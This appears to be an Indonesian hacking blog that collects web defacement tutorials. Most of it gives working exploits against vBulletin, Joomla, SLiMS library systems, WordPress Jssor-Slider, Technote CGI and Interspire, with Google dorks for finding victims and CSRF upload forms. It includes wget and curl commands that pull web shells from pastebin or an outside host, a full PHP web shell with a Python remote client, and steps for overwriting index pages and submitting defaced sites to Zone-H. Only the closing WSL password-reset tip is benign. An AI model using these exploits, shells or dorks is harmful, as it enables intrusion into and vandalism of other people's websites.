Deface VBulletin Version 5.x.x RCE


+++++++++++++++++++++++++++++++++++++++++++++++++++++++
Poc : vBulletin 5.x 0day pre-auth RCE
Source : https://packetstormsecurity.com/files/154623/vBulletin-5.x-0-Day-Pre-Auth-Remote-Command-Execution.html

Dork : inurl:/forum intext:"Powered by vBulletin"+"Version 5.4.3" (use your brain)

Exploit : http://target.co/[path]//ajax/render/widget_php
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

Pertama silahkan cari dulu targetnya pake dork yang udah ane kasih atau kembangin lagi ..
lalu masukan exploitnya untuk mengecek vuln . cek

http://target.co/[path]//ajax/render/widget_php
Maka akan tampil seperti dibawah ini


Masukkan targetnya kedalam script dibawah ini :

Script exploit.html:
<form method="POST" action="https://www.target.org/forum//ajax/render/widget_php" >

<input name="widgetConfig[code]" id="widgetConfig[code]" type="text" />

<input type="submit" />

</form>


edit pada bagian action ,, kemudian kita jalankan script csrfnya kemudian akan tampil seperti dibawah :


masukan command linux untuk memulai pengeksekusian kode bisa dengan menggunakan perintah:

echo shell_exec('id');
atau kamu coba masukan perintah perintah linux lainnya kemudian coba submit.
Maka akan seperti dibawah ini:


Perhatikan pada lingkaran merah,, itu menandakan  kode yang dipost tadi berhasil dieksekusi server. Selanjutnya kamu bisa memasukkan perintah perintah yang lain misalnya kamu mengupload shell backdoor dengan menggunakkan perintah:

echo shell_exec('wget -O shell.php https://pastebin.com/raw/4VcQuc55');

maka file shell kamu jika terupload letaknya berada dibelakang /ajax maka jika jadi target kamu https://www.target.org/forum/ajax/render/widget_php maka shell kamu berada di https://www.target.org/forum/shell.php

kemudian tinggak buka saja:

Kalo yang mau pake python bisa download scriptnya disini https://pastebin.com/raw/AWtx6B9k

Sekian tutorial dari kami terimakasih .

Fitur Rootkit Hmei7 yang Terlupakan


Selamat pagi sobat IT, kali ini saya akan bahas mengenai tool yang cukup legend ini yaitu Rootkit hmei7. Ya siapa sih gak kenal dengan tool yang satu ini, kalo dulu pasti dah pernah nyobain fitur yang ada didalam tool ini yaitu Webdav ASP Shell Maker, ya gak ?. Ane nyobain fitur webdav itu ketagihan banget gan sampai sekarang pun masih ana gunain, soalnya enak banget nyari targetnya tinggal reverse ip dapet bejibun wkwkwk tinggal nongkrongin zone h aja . Tapi tau gak sih sebenernya ada fitur lain dalan Rootkit ini yang cukup berguna banget ?. Mungkin dari kalian udah ada yang tau , ane sebenernya pengen share ini dari dulu tapi kayaknya gak penting penting amat wkwkwk tapi kalo buat ane ini berguna banget dari dulu yap nama fiturnya yaitu "Line Editor". Jadi ini fitur berguna untuk mengolah baris string, antum bisa menyisipkan atau membuang string yang ada dalam baris, misalnya buat target webdav yang jumlahnya ribuan , antum bisa olah itu string dengan fitur ini. Okeh langsung saja hal yang pertama antum lakuin adalah buka tool Rootkit Hmei7 ini , cari aja kalo belom punya soalnya ane gak akan share linknya.

1. Buka menu Tool > line editor


Okeh dari sini ane mau jelasin beberapa fitur fitur pentingnya yang ada di line editor

a. Sort it.
Tombol ini berguna untuk menyortir string pada baris berdasarkan abjad.

b. Add in the beginning.
Fitur ini berguna untuk menyisipkan string diawal string pada baris. Jadi misalkan string "www.target.com" antum tambahin string http:// jadinya "http://www.target.com" .

c. Add in the ending.
Fitur ini berguna untuk menyisipkan string diakhir string pada baris. Contohnya string "www.target.com" antum tambahin string /hujan.html jadi "www.target.com/hujan.html".

d. Remove sub folder.
Fitur ini menghilangkan string yang ada setelah baris string "/" setelah domain , contohnya string "www.target.com/hujan.html" string /hujan.html akan dihilangkan maka akan jadi "www.target.com" saja.

e. Remove duplicat
Fitur ini menghilangkan string yang sama dari semua baris maka akan menyisakan satu string saja.

f. Replace string.
Fitur ini berguna untuk menggantikan value string dengan value string lain yang lain pada baris.

g. Remove sub domain.
Fitur ini berguna untuk menghilangkan subdomain yang ada pada domain didalam baris string. Contoh string subdomain "siakad.univ.gov" makan akan menjadi "univ.gov" saja.

nah itu sebagian besarnya saja selebihnya kalian coba coba aja ya .
Sekian yang bisa ana sampaikan mohon maaf bila ada kekurangan silahkan tinggalkan komentar untuk masukkan.


Joomla Com_Media Auto Exploiter


#########################################################################
# Exploit Title: Joomla Remot File Upload Vulnerability
#########################################################################
#Reference : https://cxsecurity.com/issue/WLB-2015110194
# Google Dork1: inurl:index.php?option=com_media & site:com
# Google Dork2: inurl:index.php?option=com_media & site:org
# Google Dork3: inurl:index.php?option=com_media & site:net
# Date: [22/11/2015]
# Exploit Author: Guardiran Security Team =>DeMoN
# Vendor Homepage: [https://developer.joomla.org/joomlacode-archive/issue-29776.html]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
#########################################################################
# DISCRIPTION: Hello Guys.This Is A Olugin Of Joomla For Upload Files.
# Exploit:
# Add This Link After Address Target
# /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
# For Exmple: 
Site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
#########################################################################
#Demo :
http://www.poesiederfuesse.de/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
http://www.blumen-silvia.de//index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
#########################################################################
Download Auto Exploiter : Alternatif1 Alternatif2
#########################################################################
How to use ?
Pertama cari dulu targetnya kemudian simpan list target dalam bentuk txt ,dan siapkan file defacenya berupa file txt atau gambar (.jpg, .png, .gif) satu folderkan dengan autoexploiternya. Jika menggunakkan xampp simpan di folder /xampp/perl/bin/ kemudian jalankan dengan menggunakkan perintah:
perl exploit.pl list.txt filedeface.jpg


Tunggu sampai program selesai kemudian hasilnya akan tersimpan auto ke save.txt, dan untuk situs yang berhasil terinfeksi akan otomatis tersubmit kezone h. edit dulu dalam scriptnya pada bagian
'defacer'     => 'Nick kamu',

Baiklah sekian yang bisa saya sampaikan mohon maaf bila ada kesalahan . Wassallam. 

Slims CMS Senayan Auto Exploiter (Web Perpustakaan)


########################################################################

#Reference : https://packetstormsecurity.com/files/151676/Slims-CMS-Senayan-Library-Management-System-7.0-Shell-Upload.html
# Exploit Title : Slims CMS Senayan Library Management System 7.0 Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Team
# Date : 13/02/2019
# Vendor Homepage : slims.web.id
# Software Download Link : github.com/slims/
github.com/slims/slims8_akasia/archive/master.zip
github.com/slims/slims7_cendana/archive/master.zip
github.com/slims/s3st15_matoa/archive/master.zip
github.com/slims/slims5_meranti/archive/master.zip
github.com/slims/s3st14/archive/master.zip
# Software Information Link : slims.web.id/web/ * slims.web.id/goslims/
# Software Affected Version : 5/6/7 and previous versions
# Tested on : Windows / Linux
# Exploit Risk : High
# CXSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050260

########################################################################
########################################################################

#Google Dork 1 :  intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''

#Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id

#Google Dork 3 : inurl:''/slims5-meranti/'' site:id

#Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''

#Google Dork 5 : Powered by SLiMS site:id

#Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii

#Google Dork 7 : Beranda Depan * Info Perpustakaan * Area Anggota * Pustakawan * Bantuan Pencarian * MASUK Pustakawan. 

#Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog.

#Google Dork 9 :  SLiMS (Senayan Library Management System) is an open source Library Management System. 
                           It is build on Open source technology like PHP and MySQL.

#Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly
This software and this template are released Under GNU GPL License Version 3

#Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id

#Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog

#Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library.

#Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue)

#Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id

#Google Dork 16 : Senayan | Open Source Library Management System :: OPAC

########################################################################

########################################################################
Exploit : /admin/modules/bibliography/pop_attach.php
Download Exploiter : Alternatif1 Alternatif2
#########################################################################
Tutorial:
Pertama edit dulu scriptnya pada bagian dibawah ini
$shell = "dx.txt"; < file shell / deface kamu (satu folderkan)

Kemudian jalankan program dan masukan file list target kalian.
Ketikan perintah :
php exploit.php

Setelah selesai cek hasilnya di file laporan.txt (satu folder).
Sekian dan terimakasih, wasallam.


WordPress Jssor-Slider Library Plugin Arbitrary Exploiter


###########################################################################

# Exploit Title : WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
#Reference : https://cxsecurity.com/issue/WLB-2018060226
# CWE : CWE-284 [ Improper Access Control ] -  CWE-862  [ Missing Authorization ]
#Dork : inurl:/wp-content/jssor-slider
#Exploit : http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
#Shell Path : http://[PATH]//wp-content/jssor-slider/jssor-uploads/shell.txt
#Download Exploiter : Alternatif1   Alternatif2

###########################################################################

Jangan lupa download dulu exploiternya simpan dengan extensi *.pl (perl), okeh langsung saja.
Pertama jalankan program exploiternya kemudian masukan nama file list target dan shell / file deface kamu seperti dibawah ini. Dengan mengetikan perintah pada terminal:
cmd:\path>perl exploiter.pl


Selanjutnya tinggal tunggu saja exploiter bekerja dan lihat keterangan yang diberikan program.


Jika shell berhasil terupload maka akan auto tersimpak ke dalam file  report.txt .


Cukup sekian dan terimakasih mohon maaf bila ada kesalahan.

Remote Shell Backdoor With Python and PHP



Selamat sore sobat IT pada tutorial kali ini saya akan membagi trik Remot Shell Backdoor dengan python dan php. Yaitu kalian mengakses shell backdoor kalian melalui terminal / cmd kalian tapi ini buka backconnect ya wkwkwk. Jadi awalnya tuh saya sedang mencari tutorial exploit fuel cms terus nemu script ini deh sumber: https://www.exploit-db.com/exploits/47138 Terus saya edit edit dikit deh biar kaya gini gak papa kan :'V
Langsung saja skuy lur.

Pertama buatlah sebuah file backdoor untuk diupload ke website target kalian scriptnya dibawah ini
Script cmd.php:
<?php

function path() {

 if(isset($_GET['dir'])) {

  $dir = str_replace("\\", "/", $_GET['dir']);

  @chdir($dir);

 } else {

  $dir = str_replace("\\", "/", getcwd());

 }

 return $dir;

}

echo "Current Dir:>".path();



    if(isset($_GET['cmd'])){

  

        echo system($_GET['cmd']);

    

    }



?>



Pastikan kalian telah mengupload backdoor kalian ke target yang mau diremot nanti.
Okeh setelah memastikan shell kalian terupload dan bisa dicoba selanjutnya buatlah file python untuk meremot shell kalian . scriptnya dibawah ini:
Script remot.py:
import requests

import urllib



url = input('Input Target: ')

def find_nth_overlapping(haystack, needle, n):

    start = haystack.find(needle)

    while start >= 0 and n > 1:

        start = haystack.find(needle, start+1)

        n -= 1

    return start



while 1:

 xxxx = input('cmd:')

 burp0_url = url+xxxx

 proxy = {"http":url}

 r = requests.get(burp0_url, proxies=proxy)



 html = "<!DOCTYPE html>"

 htmlcharset = r.text.find(html)



 begin = r.text[0:20]

 dup = find_nth_overlapping(r.text,begin,2)



 print (r.text[0:dup])



Saya menggunakan python3. okeh selanjutnya jalankan program python nya diterminal kalian kemudian masukkan targetnya seperti dibawah ini:
http://target.com/[path]/cmd.php?cmd=

dan selanjutnya tinggal menjalankan perintah perintah command nya sesuai servernya ya gan, target ane servernya linux.

Sekian yang dapat saya sampaikan , mohon maaf bila ada kesalahan dan kekurangan . Mohon kembangkan lagi karena ilmu saya terbatas semoga tutorial ini bermanfaat.
Terima kasih.

Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4

Bismillahirahmanirahim, Hallo sobat IT kali ini saya akan share exploit  Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4 , sebelumnya thanks dulu buat tatsumi crew yang udah ngasih tutorial.
Langsung aja skuy lur..

++++++++++++++++++++++++++++++++++++++++++++++++++++
Dork : inurl:/technote/main.cgi
           inurl:/iboard.cgi site:kr (kembangin lagi )
Exploit : site.kr/[path]/main.cgi?board=FREE_BOARD
Tool : disini (perl file)
++++++++++++++++++++++++++++++++++++++++++++++++++++
Silahkan temen - temen cari targetnya dulu dah pake dork yang udah saya kasih ..
Jangan lupa save sourc tool yang udah saya share dengan extensi *pl , jika kalian pake linux pastikan terinstall dulu services perlnya, kalo yang pake windows bisa install Xampp kemudian simpan file di folder
  /xampp/perl/bin/  << 

kebetulan saya menggunakkan windows jadi saya pun memakai perl yang ada di xampp, selanjutnya buka CMD windows kalian , pastikan kalian berada dalam direktori /xampp/perl/bin , kalo dilinux kalian bisa langsung menjalankan. kemudian bisa langsung kalian jalankan exploitnya dengan memasukkan perintah:
cmd>perl exploit.pl http://target.kr/[path]/main.cgi?board=FREE_BOARD

Jika vuln maka akan seperti gambar diatas ini ^^^
kemudian kalian bisa test perintah perintah linux dulu untuk memastikan sudah terhubung dengan situs. seperti ls , uname -a , dsb.


Kemudian kalian coba cari cari dir yang bisa diupload file shell , untuk mengupload shell kalian . kalian paste dulu shell kalian di pastebin atau dimana saya yang penting shell kalian nantinya berbentuk text dulu terus kalian bisa gunakkan perintah:
curl http://situskalian.com/tes.txt --output shell.php
atau kalian bisa gunakan perintah yang kalian tahu silahkan, saya biasa menggunakan perintah ini.


 Jiksa shell kalian terupload maka akan seperti gambar diatas kalian bisa langsung cek shell kalian kalo begitu.

Jika tidak bisa upload file kalian bisa creat file saja dengan perintah
echo "Hacked by Peluru Kertas - Dx_Cyber">index.php
Silahkan kalian variasikan lagi karena tutorial dari saya terbatas.
Sekian tutorial yang bisa saya berikan mohon maaf bila ada kesalahan, semoga bermanfaat ilmunya
Wasallamualaikum

Deface Interspire Email Marketer 6.20 - CSRF File Upload


Bismillahirahmanirahin . .
Assalamualaikum sobat IT kali ini saya akan memberikan tutorial deface Interspire email marketer yang lagi buming2 katanya . Tapi temen - temen kebingungan dengan poc ini padahal cukup sederhana poc ini sob. langsung aja skuylah
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
PoC :  Interspire Email Marketer 6.20 - CSRF File Upload
Dork: intext:"Powered by Hairyspire Email Marketer 6.1.4" (use your brain)
Testing: site.com/admin//temp/surveys/
Exploit: surveys_submit.php?formId=[number]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Pertama siapkan dulu targetnya setelah itu kita test apakah vuln atau tidak yaitu caranya dilihat dari direktori /admin//temp/surveys/ seperti gambar dibawah ini
Pada gambar diatas kita menemukan angka "999999999" maka angka tersebut kita masukan kedalam exploit jika tidak menemukan folder berangka masukan saja angka berapapun bebas nanti otomatis akan create folder angka tersebut pokoknya yang paling penting ada folder "surveys" nya, scriptnya ada dibawah sini

Script csrf:
<!DOCTYPE HTML>
<html lang="en-US">
<head>
    <meta charset="UTF-8">
    <title></title>
</head>
<body>
<form action="http://target.com/surveys_submit.php?formId=999999999" method="post" enctype="multipart/form-data">
    <input type="file" name="widget[0][field][][value]">
    <input type="submit" value="submit" name="submit">
</form>
</body>
</html>
Langsung saja pilih shell kalian kemudian submit.
kemudian kita cek folder shell kita biasanya berada pada folder angka terakhir yaitu pada folder /admin//temp/surveys/999999999 (999999999 adalah angka yang tadi
nah angka folder terakhir adalah 21 jadi bisa kemungkinan shell kita ada disana


tinggal cek saja
Vakekok eheheh .. yahh sampai disini saha yah sobat IT mohon maaf bila ada kesalahan
termakasih telah berkunjung.

Catatan : Kalo directorinya 403 forbiden coba discan pake file finder download sourcenya

Mengatasi Lupa Password Subsystem Linux Bash Windows 10


Assalamualaikum warahmatullahi wabarakatu
Halo sobat IT sudah lama saya tidak memposting diblog ini, ya karena saya disibukan didunia real saya , tapi alhamdulillah sekarang saya dapat memposting diblog ini lagi menyempatkan waktu bernostalgia dengan tulisan tulisan tutorial haha.. okeh langsung saja skuy "Tutorial Mengatasi Lupa Password Subsystem Linux Bash Windows 10"..

Pertama buma command promt windows tentunya sebagai administrator

Kemudian ketikan perintah "ubuntu --default-user root" (tanpa kutip)

Kemudian buka subsystem linux kalian , bisa dengan mengetikan "bash" di cmd atau silahkan kalian dengan cara lain yang biasa kalian lakukan..

Lalu ganti password dengan mengetikan perintah "passwd userkamu" , untuk memasukan kedalam grup sudo masukan perintah "usermod -aG sudo userkamu"

Gunakan perintah "su - userkamu" untuk berpidah password, kemudian gunakan perintah "sudo su" untuk beralih keakses root

Okeh sudah berhasil
jika ingin menghapus user masukan perintah "deluser userkalian" di terminal subsystem linuxnya..

gunakan perintah "passwd userkamu" untuk mengetahui apakah user sudah terhapus atau belum.
Tolong beri komentar apabila saya melakukan kesalahan..
Ya mohon maaf tutorial ini hanya sampai sini yang bisa saya sampaikan semoga dilain waktu saya
semoga bermanfaat terimakasih ^_^
Barakallah fiikum